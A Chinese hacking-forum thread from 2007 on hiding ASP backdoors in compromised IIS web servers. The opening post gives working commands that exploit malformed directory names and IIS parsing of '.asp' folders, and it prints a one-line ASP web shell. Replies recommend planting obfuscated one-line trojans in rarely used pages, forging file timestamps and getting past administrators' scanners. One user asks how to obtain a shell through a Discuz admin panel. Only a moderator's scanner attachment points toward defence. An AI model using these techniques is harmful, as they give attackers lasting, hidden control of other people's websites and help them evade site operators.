打印

[讨论]隐藏ASP后门的两种方法

pt007

荣誉会员

Rank: 6 Rank: 6 Rank: 6

E.S.T论坛贵宾

帖子: 216
精华: 30
积分: 3924
阅读权限: 100
性别: 男
在线时间: 441 小时
注册时间: 2005-9-9
最后登录: 2008-11-21

发短消息
加为好友
当前离线

楼主大中小发表于 2007-1-12 12:32 只看该作者

[讨论]隐藏ASP后门的两种方法

议题作者：pt007
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

1、建立非标准目录：mkdir images..\
拷贝ASP木马至目录：copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马：http://ip/images../news.asp?action=login
如何删除非标准目录：rmdir images..\ /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析，以达到我们隐藏自己的网页后门的目的:
mkdir programme.asp
新建1.txt文件内容：
新建12.jpg文件内容：<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
attrib +H +S programme.asp
通过web访问ASP一句话木马：http://ip/images/programme.asp/1.txt

每个人都有属于自已的世界，人生因此而精彩，HACK就是我的世界！

TOP

神無月

晶莹剔透§烈日灼然

Rank: 1

帖子: 124
精华: 0
积分: 313
阅读权限: 40
性别: 男
在线时间: 37 小时
注册时间: 2006-4-22
最后登录: 2008-6-9

发短消息
加为好友
当前离线

沙发大中小发表于 2007-1-12 17:43 只看该作者

第二个方法貌似要在WIN2003+IIS6才可以吧?

TOP

永恒的沙加

晶莹剔透§烈日灼然

Rank: 1

帖子: 19
精华: 0
积分: 66
阅读权限: 40
性别: 男
在线时间: 57 小时
注册时间: 2006-8-19
最后登录: 2007-8-5

发短消息
加为好友
当前离线

椅子大中小发表于 2007-1-12 19:55 只看该作者

最简单，最有效，最隐蔽的方法就是
在网站中找一个比较大的asp页面
然后在其中插一句话马就OK了。
需要的时候就上传大马。
大马用完就删掉。
除非对方把自己网站的每个asp文件打开一行行的看
或者用备份还原。否则基本很难发现。

TOP

hack520

运维管理组

Rank: 7 Rank: 7 Rank: 7 Rank: 7

E.S.T论坛版主

帖子: 1082
精华: 6
积分: 5594
阅读权限: 150
性别: 男
在线时间: 579 小时
注册时间: 2005-3-18
最后登录: 2008-8-31

发短消息
加为好友
当前离线

板凳大中小发表于 2007-1-12 21:36 只看该作者

楼上的方法是比较实在的。插入一个访问频繁的ASP文件里，即使管理员看日志，除非一行一行看，否则是难以发现的。

Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
注：此账号密码已更改，请本人与冰血联系修改密码。

TOP

nihao1919

晶莹剔透§烈日灼然

Rank: 1

帖子: 3
精华: 0
积分: 10
阅读权限: 40
在线时间: 12 小时
注册时间: 2006-5-17
最后登录: 2008-10-18

发短消息
加为好友
当前离线

地板大中小发表于 2007-1-12 22:23 只看该作者

哈！我就是这样干地！ [s:35]

TOP

asm

运维管理组

Rank: 7 Rank: 7 Rank: 7 Rank: 7

E.S.T论坛版主

帖子: 1674
精华: 31
积分: 9626
阅读权限: 150
性别: 男
在线时间: 981 小时
注册时间: 2006-9-21
最后登录: 2008-11-21

发短消息
加为好友
当前离线

6楼大中小发表于 2007-1-14 01:09 只看该作者

引用:

引用第3楼hack520于2007-01-12 21:36发表的:
楼上的方法是比较实在的。插入一个访问频繁的ASP文件里，即使管理员看日志，除非一行一行看，否则是难以发现的。

错，用偶的扫描器就可以搞定！只要一句话木马存在，都可以把它弄出来 [s:39]

游戏吧 http://www.game8.cc/MyBlog http://www.asm32.cn

TOP

yzhuhu

晶莹剔透§烈日灼然

Rank: 1

帖子: 8
精华: 0
积分: 28
阅读权限: 40
性别: 男
在线时间: 44 小时
注册时间: 2006-10-29
最后登录: 2008-10-27

发短消息
加为好友
当前离线

7楼大中小发表于 2007-1-14 01:17 只看该作者

找个时间
我也试试 ··· [s:35]

TOP

hackest

运维管理组

Rank: 7 Rank: 7 Rank: 7 Rank: 7

E.S.T论坛版主

帖子: 882
精华: 20
积分: 5849
阅读权限: 150
性别: 男
来自: 广东
在线时间: 941 小时
注册时间: 2006-10-12
最后登录: 2008-3-3

发短消息
加为好友
当前离线

8楼大中小发表于 2007-1-14 01:33 只看该作者

记得要修改文件更改时间哦
不然也很容易被发现的
总之尽量做到与原来一样就是了 [s:39]

My Blog：http://www.hackest.cn/ [H.S.T]：http://www.hackm.com/

TOP

二哥

晶莹剔透§烈日灼然

Rank: 1

帖子: 6
精华: 0
积分: 23
阅读权限: 40
在线时间: 4 小时
注册时间: 2007-1-12
最后登录: 2007-1-31

发短消息
加为好友
当前离线

9楼大中小发表于 2007-1-14 09:50 只看该作者

第二种方法不错呵呵有时再搞不顶的时候可以用下

www.kill-v.com

TOP

永恒的沙加

晶莹剔透§烈日灼然

Rank: 1

帖子: 19
精华: 0
积分: 66
阅读权限: 40
性别: 男
在线时间: 57 小时
注册时间: 2006-8-19
最后登录: 2007-8-5

发短消息
加为好友
当前离线

10楼 大中小发表于 2007-1-14 18:56 只看该作者

引用:

引用第10楼asm于2007-01-14 01:09发表的:

错，用偶的扫描器就可以搞定！只要一句话木马存在，都可以把它弄出来 [s:39]

呵呵，扫描器放出来看看。
别以为提到一句话马就是<%execute request("value")%>

TOP

felifan

晶莹剔透§烈日灼然

Rank: 1

帖子: 60
精华: 0
积分: 197
阅读权限: 40
性别: 男
在线时间: 49 小时
注册时间: 2006-5-5
最后登录: 2008-5-29

发短消息
加为好友
当前离线

11楼 大中小发表于 2007-1-14 19:15 只看该作者

第2种方法好第一种方法放的地方文件太少但是第2种方法局限性太大了

菜鸟无所谓思想最重要

TOP

asm

运维管理组

Rank: 7 Rank: 7 Rank: 7 Rank: 7

E.S.T论坛版主

帖子: 1674
精华: 31
积分: 9626
阅读权限: 150
性别: 男
在线时间: 981 小时
注册时间: 2006-9-21
最后登录: 2008-11-21

发短消息
加为好友
当前离线

12楼 大中小发表于 2007-1-14 19:27 只看该作者

引用:

引用第14楼永恒的沙加于2007-01-14 18:56发表的:

呵呵，扫描器放出来看看。
别以为提到一句话马就是<%execute request("value")%>

当然一句话木马很多，但是偶把你说的一句话木马列为目标特征码，你就跑不掉...[s:39]

另外很多扫描asp木马的安全脚本很多.....貌似都可以扫出来

附件

web安全扫描器v1.3.rar (74 KB): 2007-1-14 19:27, 下载次数: 219

游戏吧 http://www.game8.cc/MyBlog http://www.asm32.cn

TOP

逗号

晶莹剔透§烈日灼然

Rank: 1

帖子: 38
精华: 0
积分: 117
阅读权限: 40
在线时间: 31 小时
注册时间: 2005-10-16
最后登录: 2008-11-20

发短消息
加为好友
当前离线

13楼 大中小发表于 2007-1-14 20:34 只看该作者

不能发主题，借宝地一块发一个问题，在线等，N 人给解决一下
DZ 5.0 后台，不能修改模版拿到 SHELL 上传文件后扩展名多加一个 _ 升级数据库不能导出SHELL 大家还有什么办法

TOP

hack520

运维管理组

Rank: 7 Rank: 7 Rank: 7 Rank: 7

E.S.T论坛版主

帖子: 1082
精华: 6
积分: 5594
阅读权限: 150
性别: 男
在线时间: 579 小时
注册时间: 2005-3-18
最后登录: 2008-8-31

发短消息
加为好友
当前离线

14楼 大中小发表于 2007-1-14 21:50 只看该作者

引用:

引用第10楼asm于2007-01-14 01:09发表的: 错，用偶的扫描器就可以搞定！只要一句话木马存在，都可以把它弄出来 [s:39]

韩国老不会用你的扫描器~ 哈哈~还有一点~在韩国~把创建时间和修改时间改成原来一模一样是很稳定滴~国内的傻鸟管理员就会拿个ASP脚本扫ASP马~真铞B

Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
注：此账号密码已更改，请本人与冰血联系修改密码。

TOP

魔由心生

晶莹剔透§烈日灼然

Rank: 1

帖子: 1
精华: 0
积分: 6
阅读权限: 40
在线时间: 1 小时
注册时间: 2007-1-12
最后登录: 2007-4-16

发短消息
加为好友
当前离线

15楼 大中小发表于 2007-1-14 22:07 只看该作者

各有各的方法，好用就行。

TOP

hyden

晶莹剔透§烈日灼然

Rank: 1

帖子: 1
精华: 0
积分: 6
阅读权限: 40
在线时间: 2 小时
注册时间: 2007-1-10
最后登录: 2008-1-12

发短消息
加为好友
当前离线

16楼 大中小发表于 2007-1-16 09:06 只看该作者

觉得三楼的方法不错。

TOP

proice

晶莹剔透§烈日灼然

Rank: 1

帖子: 2
精华: 0
积分: 9
阅读权限: 40
在线时间: 0 小时
注册时间: 2007-1-10
最后登录: 2008-3-3

发短消息
加为好友
当前离线

17楼 大中小发表于 2007-1-17 19:19 只看该作者

大的网页+一句话木马确实是很难找出来的！

TOP

xiaocool

晶莹剔透§烈日灼然

Rank: 1

帖子: 162
精华: 2
积分: 431
阅读权限: 40
在线时间: 76 小时
注册时间: 2005-8-4
最后登录: 2008-10-26

发短消息
加为好友
当前离线

18楼 大中小发表于 2007-1-17 20:37 只看该作者

个人觉得还是插一句话最好吧。
不过一句话也要免杀，别被lake2的那个脚本给揪出来就好了

TOP

nt_family

晶莹剔透§烈日灼然

Rank: 1

帖子: 14
精华: 0
积分: 48
阅读权限: 40
性别: 男
在线时间: 24 小时
注册时间: 2006-6-1
最后登录: 2008-10-6

发短消息
加为好友
当前离线

19楼 大中小发表于 2007-1-19 23:51 只看该作者

引用:

引用第3楼hack520于2007-01-12 21:36发表的:
楼上的方法是比较实在的。插入一个访问频繁的ASP文件里，即使管理员看日志，除非一行一行看，否则是难以发现的。

这里只说了访问，是的，这样看日志是不好看出来。不过没说修改文件的，如果网站所有文件的建立日期是200年，突然有一个是2007年的，你会怎么想

TOP

金家潘

晶莹剔透§烈日灼然

Rank: 1

帖子: 1
精华: 0
积分: 6
阅读权限: 40
在线时间: 8 小时
注册时间: 2005-11-4
最后登录: 2008-5-14

发短消息
加为好友
当前离线

20楼 大中小发表于 2007-1-20 02:39 只看该作者

WEBSHELL，怎么修改时间哟？？
是用什么软件吗？

TOP

失落的孤独

晶莹剔透§烈日灼然

Rank: 1

帖子: 25
精华: 0
积分: 101
阅读权限: 40
在线时间: 81 小时
注册时间: 2006-1-10
最后登录: 2007-12-6

发短消息
加为好友
当前离线

21楼 大中小发表于 2007-1-20 09:39 只看该作者

include的方法也不错啊，把木马放到img文件夹中变成图片的格式

TOP

dd_hack

晶莹剔透§烈日灼然

Rank: 1

帖子: 38
精华: 0
积分: 42
阅读权限: 40
性别: 男
来自: 重庆
在线时间: 28 小时
注册时间: 2006-8-19
最后登录: 2007-12-22

发短消息
加为好友
当前离线

22楼 大中小发表于 2007-1-21 11:39 只看该作者

引用:

引用第9楼asm于2007-01-14 01:09发表的:

错，用偶的扫描器就可以搞定！只要一句话木马存在，都可以把它弄出来 [s:39]

有异议,一般的站都是和别人合用的服务器,所以站点管理员要是扫描的话,估计要下载下来扫吧..那样也够麻烦的了..还不如直接覆盖一次..

TOP

hhh01

晶莹剔透§烈日灼然

Rank: 1

帖子: 3
精华: 0
积分: 41
阅读权限: 40
性别: 男
在线时间: 5 小时
注册时间: 2007-1-21
最后登录: 2008-8-4

发短消息
加为好友
当前离线

23楼 大中小发表于 2007-1-21 12:22 只看该作者

觉得插个一句话木马好隐藏

TOP

凋凌玫瑰

技术核心组

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 81
精华: 12
积分: 3855
阅读权限: 200
性别: 男
在线时间: 56 小时
注册时间: 2006-2-26
最后登录: 2008-9-19

发短消息
加为好友
当前离线

24楼 大中小发表于 2007-1-23 01:42 只看该作者

引用:

引用第2楼永恒的沙加于2007-01-12 19:55发表的:
最简单，最有效，最隐蔽的方法就是
在网站中找一个比较大的asp页面
然后在其中插一句话马就OK了。
需要的时候就上传大马。
大马用完就删掉。
.......

我不赞同,我曾经和管理员玩了几天,最后种了个马看桌面才知道,管理员在桌面打开了一个web目录的最近修改文件的搜索,人家把最近修改的都列出来了.
最近我就选择在管理员最不常用的asp文件里插入变形一句话马,并且修改文件时间,就ok了.

TOP

永恒的沙加

晶莹剔透§烈日灼然

Rank: 1

帖子: 19
精华: 0
积分: 66
阅读权限: 40
性别: 男
在线时间: 57 小时
注册时间: 2006-8-19
最后登录: 2007-8-5

发短消息
加为好友
当前离线

25楼 大中小发表于 2007-1-23 13:28 只看该作者

引用:

引用第28楼凋凌玫瑰于2007-01-23 01:42发表的:
最近我就选择在管理员最不常用的asp文件里插入变形一句话马,并且修改文件时间,就ok了.

呵呵，也不错啊
道高一尺，魔高一丈
有网管们的进步
才有我们的进步

TOP